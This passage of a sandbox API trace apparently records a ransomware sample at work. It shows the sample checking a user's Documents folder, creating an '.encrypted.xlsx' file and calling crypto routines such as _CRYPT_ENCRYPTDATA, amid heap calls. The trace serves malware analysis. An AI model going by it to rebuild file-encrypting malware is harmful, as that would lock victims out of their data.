out: hHeap=0x770000) returned 1 [0032.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0032.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0032.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0032.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0032.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0032.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0032.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0032.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0032.524] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0032.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0032.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0032.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0032.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0032.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0032.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0032.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0032.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0032.524] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.encrypted.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pftjlznx-ioickwgvw.encrypted.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0032.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0032.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0032.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0032.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0032.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0032.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0032.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0032.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0032.525] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0032.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0032.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0032.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0032.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0032.525] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0032.525] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0032.525] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0032.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0032.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0032.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0032.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0032.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0032.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0032.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0032.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0032.526] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0032.526] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x72dd, lpOverlapped=0x0) returned 1 [0032.527] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0032.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0032.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0032.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0032.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x72dd) returned 0x955018 [0032.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0032.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0032.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0032.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0032.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0032.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0032.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x72dd) returned 0x95c300 [0032.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0032.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.528] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0032.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0032.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0032.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x72dd) returned 0x955018 [0032.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0032.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0032.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0032.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.529] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0032.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0032.529] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0032.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0032.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.529] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0032.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0032.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0032.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0032.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0032.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0032.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x72dd) returned 0x955018 [0032.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0032.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0032.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0032.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3b8 [0032.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0032.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0032.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0032.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0032.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0032.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0032.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0032.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889af0 [0032.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0032.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0032.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0032.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0032.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0032.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x72dd) returned 0x9635e8 [0032.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0032.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0032.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0032.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0032.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0032.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0032.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0032.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0032.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0032.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0032.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0032.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0032.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0032.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0032.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0032.531] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0032.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0032.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0032.531] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0032.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0032.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0032.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0032.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0032.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0032.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0032.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0032.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0032.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0032.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0032.531] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0032.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0032.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0032.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0032.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da308 [0032.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0032.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0032.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0032.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cf10 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0032.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0032.532] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0032.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0032.532] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0032.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0032.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0032.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0032.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0032.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0032.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0032.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0032.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0032.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0032.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0032.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0032.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0032.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0032.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.533] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0032.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0032.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0032.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0032.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0032.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0032.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0032.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0032.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0032.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 